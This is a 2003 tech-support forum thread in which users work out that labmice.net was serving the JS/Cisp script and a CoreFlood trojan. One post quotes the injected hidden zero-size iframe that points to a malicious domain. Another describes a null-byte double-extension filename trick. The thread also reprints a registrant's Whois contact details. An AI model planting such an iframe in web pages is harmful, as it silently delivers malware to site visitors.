labmice.net infected by java script virus - ResellerRatings Store Ratings, Shopping, Deals, and Bargains
Comparison shop, read reviews, find savings, at ResellerRatings.com.
Comparison shop, read reviews, find savings, at ResellerRatings.com.
Comparison shop, read reviews, find savings.
What are you shopping for?
Digital Cameras Plasma and LCD
HDTv's iPods and Other
MP3 Players PC Laptops Camcorders

Go Back   ResellerRatings Store Ratings, Shopping, Deals, and Bargains > ResellerRatings Forums > Tech Support

Reply
 
LinkBack Thread Tools Search this Thread Display Modes
Old 05-19-2003, 02:23 PM   #1 (permalink)
Registered User
 
DVNT1's Avatar
 
Join Date: Oct 2001
Location: Ohio
Posts: 5,577
DVNT1 is on a distinguished road
Quick help needed (virus?)

Caution: I went to http://www.labmice.net and immediately got a JS/Cisp trojan/virus warning.

Is it just me or is the site really infected? (I think it's the site)

DVNT1 is offline   Reply With Quote
Old 05-19-2003, 02:37 PM   #2 (permalink)
Registered User
 
DVNT1's Avatar
 
Join Date: Oct 2001
Location: Ohio
Posts: 5,577
DVNT1 is on a distinguished road
I checked this with two other computers and they show an infection at the Labmice.net site too.
DVNT1 is offline   Reply With Quote
Old 05-20-2003, 12:36 AM   #3 (permalink)
Registered User
 
Join Date: Oct 2001
Location: Uh, Oregon . . . . y
Posts: 1,439
sharder8 is on a distinguished road
Send a message via ICQ to sharder8
DVNT1 --

I went first with Opera and nothing.

Second, went with IE and again . . . .

Harder
sharder8 is offline   Reply With Quote
Old 05-20-2003, 12:44 AM   #4 (permalink)
Registered User
 
muno's Avatar
 
Join Date: Oct 2001
Location: Finland
Posts: 3,838
muno is on a distinguished road
Send a message via Yahoo to muno
Yep, mcafee enterprise7 reports the following:
JS/Cisp ->
Then it tries to execute 'readme.txt%00demo.exe' which I find rather disturbing (using the lame trick of double extensions).
-M
muno is offline   Reply With Quote
Old 05-20-2003, 10:11 AM   #5 (permalink)
Registered User
 
DVNT1's Avatar
 
Join Date: Oct 2001
Location: Ohio
Posts: 5,577
DVNT1 is on a distinguished road
Significant part of the reply I received from them:
Quote:
...and we believe it to be a false positive caused by McAfee. We are not receiving this error when running Symantec, Sophos, Trend Micro, or Panda Antivirus, and cannot identify any malicious code in the HTML file that is being referenced.

The source of the issue is an unauthorised tag that is being dynamically generated on our web server that is redirecting some clients to www.beech-info.com, a software reseller that we have no affilation with. We are working with our webhost (Interland) to find the source of this script and eliminate it...
DVNT1 is offline   Reply With Quote
Old 05-20-2003, 10:32 AM   #6 (permalink)
Registered User
 
Join Date: Oct 2001
Location: Uh, Oregon . . . . y
Posts: 1,439
sharder8 is on a distinguished road
Send a message via ICQ to sharder8
When I reported nothing found, I should have mentioned that I'm running PC-cillin from Trend!

Harder
sharder8 is offline   Reply With Quote
Old 05-20-2003, 11:38 PM   #7 (permalink)
Registered User
 
muno's Avatar
 
Join Date: Oct 2001
Location: Finland
Posts: 3,838
muno is on a distinguished road
Send a message via Yahoo to muno
Well mcafee is, at least here, notorious for thinking everything is a virus - which I would've accepted if it was only the javascript - but since it tried to execute something I'm more worried.

I disabled mcafee and entered labmice.net, it downloaded something without prompt (I believe that to be the 'readme.txt%00demo.exe'.
-M

The piece of .exe is detected as CoreFlood Trojan (that is according to nai distributed with js/cisp)
Here is info on the virus
http://vil.nai.com/vil/content/v_100312.htm

And, emphasis on and. My registry has been modified to run an unknown program just like nai website suggests.
The site is virus infected.

Last edited by muno : 05-20-2003 at 11:42 PM.
muno is offline   Reply With Quote
Old 06-23-2003, 02:01 PM   #8 (permalink)
Registered User
 
Join Date: Jun 2003
Posts: 1
aaronjmack is on a distinguished road
Source of labmine.net virus

I called & left email for the website owner and talked to Interland (the host - which they were useless - kept trying to sign me up as if reading from a script).

By viewing the labmice.net source file from their main site, at the very bottom of the page, scrolling far to the right, is this line:


<iframe src=http://www.beech-info.com/inf214.html width=0 height=0 frameborder=0 marginwidth=0 marginheight=0></iframe>

Going to the http://www.beech-info.com site obviously doesn't do much good, but is interesting... slightly.

This is the public Whois info on beech-info.com
Beech Info LLC
Woodville, Texas
Registered through Omnistarhost.com
Created on 2-10-03, Updated 6-12-03, Expires 2-10-04
Admin: Paul Hopkins (junior@softhome.net)
(206) 666-4895
aaronjmack is offline   Reply With Quote
Old 11-03-2003, 05:14 AM   #9 (permalink)
Registered User
 
Join Date: Nov 2003
Posts: 1
Al_Bongo is on a distinguished road
We had this same problem on our Interland hosted website. They are crap - this trojan has been around for over 6 months, so they should have protected themselves against it !!
Al_Bongo is offline   Reply With Quote
Reply


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On

Recent Discussions
WD SE16 500GB Serial ATA Hard D.. (0)
Meritline Weekly Sale + Select .. (0)
Nationwide Retailers Weekly Dea.. (0)
Swissmar Wine, Beer & Champ.. (1)
FS: 200GB 7200RPM Laptop Drive.. (4)
Can i trust ShopDigitalDirect.c.. (4)
Hitachi 750GB Serial ATA Hard D.. (0)
Bike Nashbar Coupon Code Discou.. (0)
Performance Bike Coupon Code Di.. (0)
OCZ Vanquisher HSF Processor Co.. (0)
Fry's Electronics Current Insto.. (0)
OneCall.com Weekend Super Sale (0)
The New Hypersonic (1)
SanDisk Sansa 1GB Shaker MP3 Pl.. (0)
NetGear FS105 5-Port Network Sw.. (0)

All times are GMT -6. The time now is 08:27 AM.